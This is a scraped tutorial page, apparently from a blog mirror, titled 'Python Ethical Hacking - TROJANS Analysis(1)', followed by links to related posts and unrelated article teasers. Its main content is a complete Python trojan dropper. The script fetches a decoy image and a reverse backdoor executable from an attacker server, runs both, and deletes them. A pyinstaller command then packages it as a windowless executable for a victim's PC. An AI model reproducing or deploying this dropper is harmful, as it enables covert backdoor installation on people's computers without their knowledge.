Python Ethical Hacking - TROJANS Analysis(1)
TROJANS
A trojan is a file that looks and functions as a normal file(image, pdf, song ..etc).
When executed:
1. Opens the normal file that the user expects.
2. Executes evil code in the background (run a backdoor/keylogger ..etc).
Download & Execute Payload
- A generic executable that downloads & executes files.
- Ideas:
- Download backdoor + keylogger.
- Download keylogger + password recovery tool.
- Download keylogger + password recovery tool + backdoor.
- Use it as a trojan -- evil file + a normal file.
Create the download_and_exeucte Python code:
#!/usr/bin/env python
import os
import subprocess
import requests
import tempfile def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content) temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
print(temp_directory) download("http://10.0.0.43/evil-files/Galaxy.jpg")
subprocess.Popen("Galaxy.jpg", shell=True) download("http://10.0.0.43/evil-files/reverse_backdoor.exe")
subprocess.call("reverse_backdoor.exe", shell=True) os.remove("Galaxy.jpg")
os.remove("reverse_backdoor.exe")
Convert the Python Program to Windows Executable.
wine /root/.wine/drive_c/Program\ Files\ \(x86\)/Python37-/Scripts/pyinstaller.exe download_and_execute.py --onefile --noconsole
Execute the download_and_execute.exe file on the vitim PC.
The user can only see a normal picture, but the communication has been established background.
Python Ethical Hacking - TROJANS Analysis(1)的更多相关文章
- Python Ethical Hacking - TROJANS Analysis(2)
DOWNLOAD & EXECUTE PAYLOAD A generic executable that downloads & executes files. Disadvantag ...
- Python Ethical Hacking - TROJANS Analysis(4)
Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Conver ...
- Python Ethical Hacking - TROJANS Analysis(5)
Spoofing File Extention - A trick. Use the Kali Linux Program - Characters 1. Open the program. 2. F ...
- Python Ethical Hacking - TROJANS Analysis(3)
BYPASSING ANTI-VIRUS PROGRAMS AV programs detect viruses based on: 1. Code - compare files to huge d ...
- Python Ethical Hacking - Malware Analysis(1)
WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Repo ...
- Python Ethical Hacking - Malware Analysis(4)
DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. ...
- Python Ethical Hacking - Malware Analysis(3)
Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess im ...
- Python Ethical Hacking - Malware Analysis(2)
Filtering Command Output using Regex #!/usr/bin/env python import smtplib import subprocess import r ...
- Python Ethical Hacking - BACKDOORS(8)
Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...
随机推荐
- 富文本插件tinymce初始化配置参数说明
{ language: _this.language, // 显示语种 selector: #${_this.tinymceId}, // 容器的id height: _this.height, // ...
- vue-admin-template搭建后台管理系统的学习(一)
首先我们来看看这个基础模版的目录结构 ├── build // 构建相关 ├── config // 配置相关├── src // 源代码│ ├── api // 所有请求│ ├── ass ...
- Linux远程连接mongodb
当没有客户端工具,eg:robo3T时,如何修改mongodb里的数据呢? 1.连接mongodb服务器mongo 1.1.1.1:1688 2.查看数据库列表show dbs 3.选择使用log库u ...
- intellij配置github
一.在IDEA中设置Git,在File-->Setting->Version Control-->Git-->Path to Git executable选择你的git安装后的 ...
- skywalking与pinpoint全链路追踪方案对比
由于公司目前有200多微服务,微服务之间的调用关系错综复杂,调用关系人工维护基本不可能实现,需要调研一套全链路追踪方案,初步调研之后选取了skywalking和pinpoint进行对比; 选取skyw ...
- windows 创建python独立开发环境
参考廖雪峰教程:https://www.liaoxuefeng.com/wiki/1016959663602400/1019273143120480 进去的方式需要修改,找到自己创建的文件目录 在控制 ...
- json自定制
import json from datetime import date from datetime import datetime class JsonCustomEncoder(json.JSO ...
- django.core.exceptions.ImproperlyConfigured: mysqlclient 1.3.13 or newer is required; you have 0.9.2的最佳处理方法,亲测可用
django.core.exceptions.ImproperlyConfigured: mysqlclient 1.3.13 or newer is required; you have 0.9.2 ...
- (五)ELK Logstash output
# 输出插件将数据发送到一个特定的目的地, 除了elasticsearch还有好多可输出的地方, 例如file, csv, mongodb, redis, syslog等 output { if [t ...
- Linux进程监控命令
最近使用centos在建站,没有用市面上的什么服务商的服务器,自己用树莓派3B+建了这个博客.但是发现经常宕机,所以想看看服务器在干什么,百度了很久,发现vmstat命令不错,拿出来推荐推荐. 这是我 ...